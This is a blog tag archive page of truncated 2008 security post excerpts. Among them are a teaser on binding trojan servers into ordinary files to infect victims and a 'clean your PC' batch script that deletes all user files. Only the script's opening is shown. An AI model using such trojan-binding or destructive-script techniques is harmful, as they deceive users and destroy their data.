RSS

Tag Archive | "security"

Security : Clear Data written in page file before shutdown

Saturday, June 28, 2008

0 Comments

As an added security precaution it is possible to clear all data that has been written to the page file so it cannot be retrieved. The downside to this tweak is that it may substantially increase shutdown time depending on the amount of data in the page file. [Start] –> [Run] –> Type Regedit –> Press [...]

Continue reading...

I am surprised by the lack of awareness on network security at corporate level

Monday, May 12, 2008

1 Comment

Till today I never used a broadband connection other than the one they provide at my college. At college we are behind a proxy server, so we are not in direct connection with the computers outside our college. Today I happened to use BSNL dataone broadband internet connection at my uncle’s place, and I casually scanned [...]

Continue reading...

Unknowingly Installed File Types Can Be Viruses or trojans

Tuesday, April 22, 2008

2 Comments

Viruses, Trojans and worms can be connected to your files and when you click on that file the virus or Trojan get automatically installed and you can’t even notice that. These viruses can be connected with files like images, videos, programs and many more file types. How it works : Simple to create such file is using a [...]

Continue reading...

Why should your users use least privilege on their corporate computers?

Friday, April 18, 2008

0 Comments

If a business allows it’s users to install whatever software they choose and/or make configuration changes then they run the increased risk of the security of the machine being compromised. I recommend wherever possible businesses should refrain from giving end users administrative rights over the machines they use thereby preventing users from installing software (that [...]

Continue reading...

File Binding : Its Like Mixing Poison In A Drink

Monday, March 24, 2008

1 Comment

Note: Here I am continuing the Trojans introduction to little advanced version in this post. As I already told you that there are two parts in trojan . One is server and other is client. The hacker have client installed on his system and tries to install the server on victim’s PC. But for that either [...]

Continue reading...

Clean your PC with batch file programming(Formatting)

Sunday, March 9, 2008

0 Comments

Note  : your all files will be cleaned by using this script , so don’t try it if you have any important dada. Hello friends To clean your PC BY BATCH FILE PROGRAMMING just copy and save in notepad as batch.bat and run the file it will clean your pc. All files of administrator will be deleted Script: *******************************************@echo off if %username% [...]

Continue reading...

Basic computer security tips

Sunday, March 9, 2008

0 Comments

Computer security is something everyone who uses the internet should learn about and use to protect themselves while they use the internet. Physical security This type of security is overlooked as not being a risk but it is. Anyone that has access to the machine can interrupt the boot process to get to a command prompt and [...]

Continue reading...

How hackers used to hack through windows

Friday, March 7, 2008

0 Comments

Disclaimer : The article is written for knowledge sharing purpose and let people know how hackers work. Any wrong use of it will make a criminal offense and you can get caught by cyber criminal investigators. Hacking with Windows Hackers used hack through windows in large extent because at the start of hacking unix and linux such [...]

Continue reading...

Make Your Windows Truly personalized Part -I

Friday, March 7, 2008

0 Comments

Shortcut to restarting xp.. You can restart a Windows XP Pro and Home machine easily by creating a shortcut with following path. (Assume you installed Windows XP on your C: Partition) “c:\windows\system32\shutdown.exe -r -f -t 00″ -r is for restarting the computer. -f is to force close all programs without saving. -t 00 is used to [...]

Continue reading...

Top ten best hackers of the world

Thursday, March 6, 2008

9 Comments

The Ten Biggest Legends of the Hacker Universe The culture started from the, The hackers culture. Now I am an ethical hacker and many more people like me either interested in or wanted to be hacker , DO you know why is that so ? Answer is these guys made term hacking popular worldwide. I [...]

Continue reading...